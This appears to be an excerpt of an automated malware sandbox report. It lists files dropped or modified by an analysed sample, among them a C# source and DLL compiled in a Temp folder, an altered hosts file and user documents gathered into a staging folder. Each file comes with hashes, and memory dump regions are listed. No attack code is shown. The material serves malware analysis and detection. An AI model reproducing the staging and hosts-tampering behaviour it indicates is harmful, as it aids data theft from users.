60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\zkpocxwu\zkpocxwu.dll

Filesize
4KB

MD5
6874fa09feb0f2c335f28e50be43fa49

SHA1
05985da3ea410bfde0813926f60c9675a460c731

SHA256
154d6b4ac2ecbc881a3a34bdb6283b65bb7bfda4618c0d6e345ae397472ef3b6

SHA512
8539af1dc81d7c0361dcebd56ea80630f9c68d0f54552701cb54dd711ca62f77a6a5f5f1ca3253fcd7a827adbb4a51c27bd8a7b83117f4d4d8ce4c505bf5eccf

Download Submit
C:\Users\Admin\AppData\Local\Temp\  \Common Files\Desktop\OpenCheckpoint.png

Filesize
768KB

MD5
508d74e5d7ba8fc9bf598b7a0a516fac

SHA1
8329701719ef65e1505c0e57357a2a91403097c2

SHA256
bbabd6b1949dc5088c8aac802af8b67e8802ff3b47b1255aaaa45f70f704b8e7

SHA512
dd7a5ad0b56fdcd4167a9cafc3e70d4b07a87265268b9b607c2d12fb9f4e7261e324429c62c325a85c54afe0a7165da972708d9d5183dfe24ed936891ba56048

Download Submit
C:\Users\Admin\AppData\Local\Temp\  \Common Files\Desktop\RestartBackup.vsdx

Filesize
1.1MB

MD5
1e5d39c835efb2f91b65f4c488b0be9e

SHA1
b45ea9aa18879767a90f105041f63d3850878511

SHA256
94e96337075286aeca473e50238942b5b27a3f1291801f932e7951ee1d18fd8a

SHA512
d579181702bb2bc94382986ff7ad8a4fab6484ae3a08d90763d62646de1dd874afb78699798784adea921b1037515601c9068a9ca339c15ffe6f8eebbdc99d33

Download Submit
C:\Users\Admin\AppData\Local\Temp\  \Common Files\Documents\AddConfirm.docx

Filesize
15KB

MD5
a56b678fb11fc8e7df52b789ade9cdde

SHA1
bdadfd856930684a9476c4d0b87e56769dd38a7a

SHA256
014ea85c097d43ed74ad48519129b8b1eb17bc931a45a429141acd37fe3f9ada

SHA512
3b061437b6d213da1a5982c152bc4bd19bc644fbad32cf052c91d0713ea4d1a8a591ccb0a82b3b282f251faaee87ba7ce94dfab71e05de40ef457f6c264903c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\  \Common Files\Documents\AssertBackup.vsdm

Filesize
287KB

MD5
008d4762c3cd10a82081c9094bb53aa9

SHA1
d6bb0a6f64cc7bef52464cd1d34e64309ac0fba1

SHA256
331e6334db96c01643b497e49523c48859c6b42b9bf54842e753863b061330ea

SHA512
44050a2b236a008d991dde430c853cc347d16ecc6ed541ecda8025ab669e53b530d488ad8ef0bb037b025e919fa015bbb2db822dfed7097401f8d485c2141af8

Download Submit
C:\Users\Admin\AppData\Local\Temp\  \Common Files\Documents\ConvertToUnregister.pdf

Filesize
244KB

MD5
a7ddb5113928b5ece6813cd205052ae4

SHA1
76226ef12a8eb1b6938649de34f4bb3addc24e48

SHA256
edb7d8801bec5f037edba0349ee19b6b4f53ea34ef93b495a53ebc534fecdf58

SHA512
4951a2818e5b21c1c3b3984664fbeacc60f4f0ecb7335e1601b16cae0949f47351dba309c4b80f605d23435821ecd62798fd72c738a263360c20882de2771002

Download Submit
C:\Users\Admin\AppData\Local\Temp\  \Common Files\Documents\NewTest.xlsx

Filesize
12KB

MD5
98e07b3eb7f6899f7e653252a18cbbf7

SHA1
b5a1394bbbea6ee54e4e9cd61197551d054d9b02

SHA256
5df97926b1797d207e2358cbfe42ba80cf3aac7725c31dcff4befca255fdb653

SHA512
58a9c99bea528b32596c5fd6fd01ad4d040d8405b6772fd853961156fedf66cb32e3bc762894753d90e28739992a97178ae77ccf1847df6788daa35afbd3efe3

Download Submit
C:\Users\Admin\AppData\Local\Temp\  \Common Files\Documents\RevokeUnblock.txt

Filesize
229KB

MD5
0e5ea12cf5b6e2fd12f67104bbdf7ea8

SHA1
32cea496e589aadd04793e22df502825546b1516

SHA256
e6b35f22e8ae4d810a6eb0786801fce3ce70babfcf939eb78cec14f5dcf59532

SHA512
515625c613bf591fb5fc6d7fcea0b7781babe368c47109f62793a7a77777415c5c1dccfe56833477dafa79c0867bc604a7ee4a1268edc34b07a1dce81639b189

Download Submit
C:\Users\Admin\AppData\Local\Temp\  \Common Files\Documents\ShowRepair.docx

Filesize
16KB

MD5
6e4fac1234f13cbd35aa880531dcb1ed

SHA1
3df444b2845eb2750a7a4a4ba6853febf5abcee9

SHA256
df87d4e9ec557344da30d4683052388874dd3b9635b70695677090884a10a264

SHA512
1375f48fc7815e189265eda9508da8b11d232331f0037a3f4e23db7c323a688bcf8eeff59e55f7ebd047630cc4403769ab88c8f898889560136a6177d62c9ba4

Download Submit
C:\Users\Admin\AppData\Local\Temp\  \Common Files\Documents\TraceRestart.docx

Filesize
16KB

MD5
f24c6048ab5fb6bf5c0c792eeed813a8

SHA1
d20be0c63b9b57139a854e9012f7d5a9fb27ef42

SHA256
d79799a4b5f55afb49143ceaa7b5d033f48aec8e655d52ffc07b1ba1f723fb76

SHA512
e9a02d4ad3fd917af526e06e0aaf6c99381e3c1f24118854da379b5449bf6cd617352e02ce80e0f69ad76880bd8964c9415c87d9fbc1d31c77c340df7ed9058f

Download Submit
C:\Users\Admin\AppData\Local\Temp\  \Common Files\Downloads\GroupPop.mp3

Filesize
382KB

MD5
b9677b235b4ae3db862a60d6ea9c6fcc

SHA1
239ffd105d61501ef25001608c9357e7ab311673

SHA256
6f70ed581663be805167f4b0bd2781f0ac955face7aa5f6284ea2f333f06b34a

SHA512
aa642043b97fb1c3db66096b45119074cbd3fbcd6f7172c7b01fc2b72ff85fe97c0352c3b6e7067185580fb42ddd0f89e67162cb2c3d8c7d851e5092399c9697

Download Submit
C:\Users\Admin\AppData\Local\Temp\  \Common Files\Downloads\PingDisconnect.jpg

Filesize
286KB

MD5
e6ec3186aea264f5a431240a9071fde0

SHA1
939b2317310ff7a87690e5dc1ddd105ae4ed332d

SHA256
3e5c6ce169d82b7f147e32a4997cc2ba8647e10008f9436be7dcce5963036d3e

SHA512
785bbc238b6ecaed8938ecc366d22c7081ddf8e42e5b685b6857fdf0df974b99bbdb0b4c402a50f2461c655bfc05c1ffe4a9cb4a2b6bb24d38d7b1fbb3aa3bbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\  \Common Files\Downloads\TestSet.mp3

Filesize
423KB

MD5
73e969e53e47698ce4633c62cf6672a3

SHA1
7e521131233a83b2569e38448d29514b17ea2692

SHA256
90ea3b2914f4c24441a7cd9956921c0bc405ad49696ad2a0968a22c9124449bb

SHA512
a36a69c1e8232b4323cf1e8d3c323eec420ac3ad582088ad9b6865f20b8285e262d929c0958ae2881ef92b345356f71dad229d2f7056670a58f262d5622860ae

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zkpocxwu\CSCBA21C4375404F7EA9E3E763271EA94.TMP

Filesize
652B

MD5
a1be1ad656e1fc4fab9eb31cf556d329

SHA1
0debbe2c2fad6b08cd2baa8cc340cdfeb5f7cd63

SHA256
9feb1a96a175292590976174ba5505f65bbaacf248fc818e79dc6129418612fc

SHA512
71ca17a8d576884268e8bf86ac3e93aa1729b267dadc1e5aad0a20ef920c8c53fa32531e8deef163101847a2bdf472a40cbf8bc8176b72f7627258465acc034f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zkpocxwu\zkpocxwu.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zkpocxwu\zkpocxwu.cmdline

Filesize
607B

MD5
22cd269ab1c2617a9f809586937d8080

SHA1
00ff41b0d76df82da4e04c4e7d252d4035219f50

SHA256
ebb589dc4bacb7957e1cb3f268afc1b648ec7532f98f67e797c82be1d2676a41

SHA512
a7c567b2814a5aca3c582495390f50ca77a6f554cfbec09d01a6e44215b7decb72cb2ef45736e14577edc240fcb147762b4770b4d514bd0f7a5b73eb0a645199

Download Submit
memory/3124-50-0x00007FFF86980000-0x00007FFF8699A000-memory.dmp

Filesize
104KB

Download
memory/3124-25-0x00007FFF6FD50000-0x00007FFF703B7000-memory.dmp

Filesize
6.4MB

Download
memory/3124-105-0x00007FFF81010000-0x00007FFF81035000-memory.dmp

Filesize
148KB

Download
memory/3124-76-0x00007FFF857E0000-0x00007FFF857F4000-memory.dmp

Filesize
80KB

Download
memory/3124-79-0x00007FFF859C0000-0x00007FFF859CD000-memory.dmp

Filesize
52KB

Download
memory/3124-72-0x000002A703920000-0x000002A703E53000-memory.dmp

Filesize
5.2MB

Download
memory/3124-73-0x00007FFF6F810000-0x00007FFF6FD43000-memory.dmp

Filesize
5.2MB

Download
memory/3124-331-0x00007FFF6FD50000-0x00007FFF703B7000-memory.dmp

Filesize
6.4MB

Download
memory/3124-74-0x00007FFF85B00000-0x00007FFF85B27000-memory.dmp

Filesize
156KB

Download
memory/3124-70-0x00007FFF6FD50000-0x00007FFF703B7000-memory.dmp

Filesize
6.4MB

Download
memory/3124-71-0x00007FFF7CFA0000-0x00007FFF7D06E000-memory.dmp

Filesize
824KB

Download
memory/3124-279-0x00007FFF80FD0000-0x00007FFF81003000-memory.dmp

Filesize
204KB

Download
memory/3124-66-0x00007FFF80FD0000-0x00007FFF81003000-memory.dmp

Filesize
204KB

Download
memory/3124-64-0x00007FFF8A3B0000-0x00007FFF8A3BD000-memory.dmp

Filesize
52KB

Download
memory/3124-62-0x00007FFF85910000-0x00007FFF85929000-memory.dmp

Filesize
100KB

Download
memory/3124-60-0x00007FFF7CDF0000-0x00007FFF7CF79000-memory.dmp

Filesize
1.5MB

Download
memory/3124-58-0x00007FFF81010000-0x00007FFF81035000-memory.dmp

Filesize
148KB

Download
memory/3124-52-0x00007FFF85800000-0x00007FFF8582B000-memory.dmp

Filesize
172KB

Download
memory/3124-81-0x00007FFF75F80000-0x00007FFF76033000-memory.dmp

Filesize
716KB

Download
memory/3124-32-0x00007FFF8AF50000-0x00007FFF8AF5F000-memory.dmp

Filesize
60KB

Download
memory/3124-30-0x00007FFF85B00000-0x00007FFF85B27000-memory.dmp

Filesize
156KB

Download
memory/3124-172-0x00007FFF7CDF0000-0x00007FFF7CF79000-memory.dmp

Filesize
1.5MB

Download
memory/3124-78-0x00007FFF86980000-0x00007FFF8699A000-memory.dmp

Filesize
104KB

Download
memory/3124-343-0x00007FFF857E0000-0x00007FFF857F4000-memory.dmp

Filesize
80KB

Download
memory/3124-296-0x000002A703920000-0x000002A703E53000-memory.dmp

Filesize
5.2MB

Download
memory/3124-295-0x00007FFF7CFA0000-0x00007FFF7D06E000-memory.dmp

Filesize
824KB

Download
memory/3124-306-0x00007FFF6F810000-0x00007FFF6FD43000-memory.dmp

Filesize
5.2MB

Download
memory/3124-316-0x00007FFF6FD50000-0x00007FFF703B7000-memory.dmp

Filesize
6.4MB

Download
memory/3124-322-0x00007FFF7CDF0000-0x00007FFF7CF79000-memory.dmp

Filesize
1.5MB

Download
memory/3124-346-0x00007FFF6F810000-0x00007FFF6FD43000-memory.dmp

Filesize
5.2MB

Download
memory/3124-356-0x00007FFF7CFA0000-0x00007FFF7D06E000-memory.dmp

Filesize
824KB

Download
memory/3124-355-0x00007FFF80FD0000-0x00007FFF81003000-memory.dmp

Filesize
204KB

Download
memory/3124-354-0x00007FFF8A3B0000-0x00007FFF8A3BD000-memory.dmp

Filesize
52KB

Download
memory/3124-353-0x00007FFF85910000-0x00007FFF85929000-memory.dmp

Filesize
100KB

Download
memory/3124-352-0x00007FFF7CDF0000-0x00007FFF7CF79000-memory.dmp

Filesize
1.5MB

Download
memory/3124-351-0x00007FFF81010000-0x00007FFF81035000-memory.dmp

Filesize
148KB

Download
memory/3124-350-0x00007FFF85800000-0x00007FFF8582B000-memory.dmp

Filesize
172KB

Download
memory/3124-349-0x00007FFF86980000-0x00007FFF8699A000-memory.dmp

Filesize
104KB

Download
memory/3124-348-0x00007FFF8AF50000-0x00007FFF8AF5F000-memory.dmp

Filesize
60KB

Download
memory/3124-347-0x00007FFF85B00000-0x00007FFF85B27000-memory.dmp

Filesize
156KB

Download
memory/3124-345-0x00007FFF75F80000-0x00007FFF76033000-memory.dmp

Filesize
716KB

Download
memory/3124-344-0x00007FFF859C0000-0x00007FFF859CD000-memory.dmp

Filesize
52KB

Download
memory/3636-210-0x000002772DD90000-0x000002772DD98000-memory.dmp

Filesize
32KB

Download
memory/5644-88-0x000002796A110000-0x000002796A132000-memory.dmp

Filesize
136KB

Download